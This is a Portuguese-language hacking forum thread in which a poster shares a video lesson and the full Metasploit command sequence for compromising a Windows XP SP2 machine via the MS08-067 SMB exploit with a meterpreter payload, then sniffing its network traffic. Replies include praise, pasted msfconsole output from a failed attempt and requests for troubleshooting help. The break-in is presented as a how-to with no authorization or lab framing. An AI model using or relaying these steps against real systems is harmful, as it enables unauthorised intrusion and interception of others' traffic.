Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Metasploit - Sniffer via meterpreter

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Video Aula Metasploit - Sniffer via meterpreter

    Essa video e sobre sniffer via meterpreter em um micro invadido.

    O que eu fiz?
    Invadir um micro usando Windows XP SP2 com o metasploit e rodei o modulo sniffer.

    Comando:
    use windows/smb/ms08_067_netapi
    set PAYLOAD windows/meterpreter/bind_tcp
    set RHOST IP_do_alvo
    exploit
    use sniffer
    sniffer_interfaces
    sniffer_start 1 200000
    sniffer_stats 1
    sniffer_dump 1 /local_destino_do_log.cap
    sniffer_stop 1
    Baixar:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Assistir on-line:
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Similar Threads

  • Font Size
    #2
    ola gostei da video porm acho que vc deeria explicr melhor porque vc fz as coisas muinto rpido devria explicar mais e apenas uma o opinião mais gostei vlw
    sigpic

    skype e email c4p3lob8@hotmail.com

    Comment


    • Font Size
      #3
      Postado Originalmente por c4p3lob8 Ver Post
      ola gostei da video porm acho que vc deeria explicr melhor porque vc fz as coisas muinto rpido devria explicar mais e apenas uma o opinião mais gostei vlw
      Veja as video anteriores... seu eu explicar tudo, a aula fica muito grande...

      me fale a parte da duvida que responto no tópico.

      Comment


      • Font Size
        #4
        Bhior,
        Excelente mano, obrigado, é desse conteúdo que precisamos.
        Muito bom os seus tópicos, faz jus ao nome do fórum :}

        Abraço.
        Mesmo longe, eu estou perto. Guia do Hacker 4ever.

        Comment


        • Font Size
          #5
          Mto Bom, mas aqui nao da certo, olha oque aparece:


          root@bt:/pentest/exploits/framework3# ./msfconsole

          ____________
          < metasploit >
          ------------
          \ ,__,
          \ (oo)____
          (__) )\
          ||--|| *


          =[ metasploit v3.7.2-release [core:3.7 api:1.0]
          + -- --=[ 703 exploits - 358 auxiliary - 56 post
          + -- --=[ 224 payloads - 27 encoders - 8 nops
          =[ svn r13014 updated today (2011.06.23)

          msf > use windows/smb/ms08_067_netapi
          msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
          PAYLOAD => windows/meterpreter/bind_tcp
          msf exploit(ms08_067_netapi) > set RHOST 10.1.1.7
          RHOST => 10.1.1.7
          msf exploit(ms08_067_netapi) > exploit
          [*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP - Service Pack 2 - lang:Portuguese - Brazilian[*] Selected Target: Windows XP SP2 Portuguese - Brazilian (NX)[*] Attempting to trigger the vulnerability...[*] Exploit completed, but no session was created.
          msf exploit(ms08_067_netapi) >


          Me Ajuda aew Por Favor !

          Comment


          • Font Size
            #6
            Esta acontecendo a mesma coisa comigo.

            Onde serÁ que estamos errando

            Comment


            • Font Size
              #7
              Parabéns pelo post, Testado e Aprovado, uma dia para o pessoal tem que intender um pouco de linux, porque para usar o s.o blacktrack é necessário saber, os comandos do linux.

              Mas esta de parabéns pelo post.

              Comment


              • Font Size
                #8
                realmente, mto boa
                sigpicToda verdade passa por três estágios. Primeiramente, é ridicularizada. Em segundo lugar, é violentamente confrontada. Por último, torna-se aceita como evidência

                Comment


                • Font Size
                  #9
                  Galera para min, nao esta criando a sessão, ajudar aew por favor

                  Comment

                  X
                  Working...
                  X